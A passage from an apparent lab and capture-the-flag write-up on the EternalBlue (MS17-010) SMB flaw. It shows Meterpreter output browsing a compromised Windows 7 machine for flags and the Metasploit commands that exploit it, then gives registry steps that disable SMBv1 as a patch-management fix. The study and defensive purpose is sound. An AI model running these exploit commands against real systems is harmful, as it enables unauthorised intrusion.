100666/rw-rw-rw- 524288 fil 2019-03-18 03:52:17 +0530 SECURITY{016888c5-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
100666/rw-rw-rw- 40632320 fil 2025-01-25 14:06:59 +0530 SOFTWARE
100666/rw-rw-rw- 1024 fil 2011-04-12 14:02:10 +0530 SOFTWARE.LOG
100666/rw-rw-rw- 262144 fil 2025-01-25 14:06:59 +0530 SOFTWARE.LOG1
100666/rw-rw-rw- 0 fil 2009-07-14 08:04:08 +0530 SOFTWARE.LOG2
100666/rw-rw-rw- 65536 fil 2019-03-18 03:51:19 +0530 SOFTWARE{016888c9-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
100666/rw-rw-rw- 524288 fil 2019-03-18 03:51:19 +0530 SOFTWARE{016888c9-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw- 524288 fil 2019-03-18 03:51:19 +0530 SOFTWARE{016888c9-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
100666/rw-rw-rw- 12582912 fil 2025-01-25 14:06:32 +0530 SYSTEM
100666/rw-rw-rw- 1024 fil 2011-04-12 14:02:06 +0530 SYSTEM.LOG
100666/rw-rw-rw- 262144 fil 2025-01-25 14:06:32 +0530 SYSTEM.LOG1
100666/rw-rw-rw- 0 fil 2009-07-14 08:04:08 +0530 SYSTEM.LOG2
100666/rw-rw-rw- 65536 fil 2019-03-18 03:51:22 +0530 SYSTEM{016888cd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
100666/rw-rw-rw- 524288 fil 2019-03-18 03:51:22 +0530 SYSTEM{016888cd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw- 524288 fil 2019-03-18 03:51:22 +0530 SYSTEM{016888cd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
040777/rwxrwxrwx 4096 dir 2018-12-13 04:33:05 +0530 TxR
100666/rw-rw-rw- 34 fil 2019-03-18 01:02:48 +0530 flag2.txt
040777/rwxrwxrwx 4096 dir 2010-11-21 08:11:37 +0530 systemprofile
(Meterpreter 2)(C:\\Windows\\System32\\config) > cat flag2.txt
flag{sam_database_elevated_access}- Flag2 :
flag{sam_database_elevated_access}
Flag 3
(Meterpreter 2)(C:\\) > cd /
(Meterpreter 2)(C:\\) > cd Users\\\\
(Meterpreter 2)(C:\\Users) > ls
Listing: C:\\Users
=================Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2009-07-14 10:38:56 +0530 All Users
040555/r-xr-xr-x 8192 dir 2009-07-14 12:37:31 +0530 Default
040777/rwxrwxrwx 0 dir 2009-07-14 10:38:56 +0530 Default User
040777/rwxrwxrwx 8192 dir 2018-12-13 08:43:45 +0530 Jon
040555/r-xr-xr-x 4096 dir 2011-04-12 13:58:15 +0530 Public
100666/rw-rw-rw- 174 fil 2009-07-14 10:24:24 +0530 desktop.ini
(Meterpreter 2)(C:\\Users) > cd Jon\\\\Documents\\\\
(Meterpreter 2)(C:\\Users\\Jon\\Documents) > ls
Listing: C:\\Users\\Jon\\Documents
===============================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2018-12-13 08:43:31 +0530 My Music
040777/rwxrwxrwx 0 dir 2018-12-13 08:43:31 +0530 My Pictures
040777/rwxrwxrwx 0 dir 2018-12-13 08:43:31 +0530 My Videos
100666/rw-rw-rw- 402 fil 2018-12-13 08:43:48 +0530 desktop.ini
100666/rw-rw-rw- 37 fil 2019-03-18 00:56:36 +0530 flag3.txt
(Meterpreter 2)(C:\\Users\\Jon\\Documents) > cat flag3.txt
flag{admin_documents_can_be_valuable}
- Flag3 :
flag{admin_documents_can_be_valuable}
Patch Management
The process of identifying, acquiring, testing, and installing software updates (called patches) on systems and applications to fix security vulnerabilities, bugs, or performance issues.
In simple terms → This is how ‘Patch Management Engineer’ keeps the organizations systems secure and up to date.
Why Patch Management Matters
- Security: Most cyberattacks exploit known vulnerabilities. Applying patches closes those security holes before attackers can use them.
- Stability: Patches also fix system crashes, performance issues, and compatibility problems.
- Compliance: Many regulations (like ISO 27001, PCI-DSS, HIPAA) require regular patching as part of security hygiene.
- Reliability: Systems stay more stable and perform better when regularly updated.
Patch Management Process
A good patch management cycle includes:
- Asset Discovery → Identify all devices and software in your environment.
- Vulnerability Assessment → Determine which systems are missing patches or updates.
- Patch Prioritization → Rank patches by severity (critical → low).
- Testing → Test patches in a controlled environment before wide deployment.
- Deployment → Apply patches to production systems in a phased or automated manner.
- Verification → Confirm patches were successfully installed.
- Documentation & Reporting → Maintain records for audits and compliance.
Example: Patch Management for EternalBlue (MS17–010)
The EternalBlue exploit (MS17–010) targeted a flaw in Microsoft’s SMBv1 protocol. Systems that hadn’t applied Microsoft’s March 2017 security update were vulnerable to remote code execution.
Effective patch management here would mean:
- Detecting unpatched Windows 7 / Server 2008 systems.
- Applying the MS17–010 update from Microsoft.
- Disabling SMBv1 to mitigate future risks.
- Verifying that updates were successfully applied
Lab setup & quick Metasploit verification (EternalBlue)
I built a small lab to demonstrate the EternalBlue (MS17–010) scenario. Apart from the TryHackMe challenge, I used a victim machine running Windows 7 Ultimate (Service Pack 1) and an attacker machine running Kali Linux. Since the full exploitation process is already covered above, I’ll skip the step-by-step attack here and show how to verify whether the target is vulnerable using Metasploit and patch the vulnerability.
Step 1: Check the victim OS details → confirm the Windows version and service pack on the victim.
Press enter or click to view image in full size
Step 2: Check the victim IP → identify the target IP address to scan/verify.
Press enter or click to view image in full size
Step 3: Verify vulnerability with Metasploit → set the module and run the check action.
Press enter or click to view image in full size
- Select the EternalBlue module
use exploit/windows/smb/ms17_010_eternalblue- Set the target hosts
set rhosts 10.4.4.133- Verify whether the target is vulnerable
check- Now attack the system and gain access
Press enter or click to view image in full size
- Command to execute attack
run- To verify Victim details
sysinfoNote: Now it’s time for patch management. There are many ways to do this, but here I’ll show the change I made to disable SMBv1. I’m going to demonstrate by editing the Windows registry to disable SMBv1 on the target machine. That reduces exposure to EternalBlue and similar SMB-based exploits.
Method 1: Using CLI (Registry) → I did this in my lab
Note: Run CMD as Administrator, Back up the registry or create a system restore point before making changes.
Steps I followed
- Backup the registry
# Export a registry snapshot (save this file somewhere safe)
reg export "HKLM\SYSTEM\CurrentControlSet\Services" C:\temp\registry-backup-SYSTEM.reg2. Disable the SMBv1 Server component
reg add "HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v SMB1 /t REG_DWORD /d 0 /f3. Reboot the machine to apply changes:
shutdown /r /t 0Notes & warnings:
- Run these commands with Administrator privileges on CMD.
- Back up the registry (or create a system restore point) before editing.
- Disabling SMBv1 can break very old applications or devices that require it test in a lab first.
- After reboot, verify SMBv1 is disabled (you can re-run vulnerability checks or inspect the registry values).
Method 2: Using GUI (Registry) → I did this in my lab
Note: Run CMD as Administrator, Back up the registry or create a system restore point before making changes.
Steps I followed (Registry Editor)
- Press Win + R, type
regedit, and press Enter.
Press enter or click to view image in full size
2. If prompted by UAC, click Yes to run Registry Editor as Administrator.
Press enter or click to view image in full size
3. Navigate to the SMB server key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\ParametersPress enter or click to view image in full size
In the right pane:
Press enter or click to view image in full size
- If a
DWORD (32-bit) Valuenamed SMB1 exists, double-click it and set Value data to0. - If it does not exist, right-click → New → DWORD (32-bit) Value, name it SMB1, then set Value data to
0. - Click on OK to apply changes.
Press enter or click to view image in full size
4. Now try to attack the victim
Press enter or click to view image in full size
Note: I successfully patched the vulnerability on the lab machine. This demonstrates patch management in action discovering a security flaw, applying the appropriate fix, and verifying the system is no longer vulnerable. Patch management isn’t just about installing updates; it’s the full process of detection, remediation, and verification to keep systems secure.
Press enter or click to view image in full size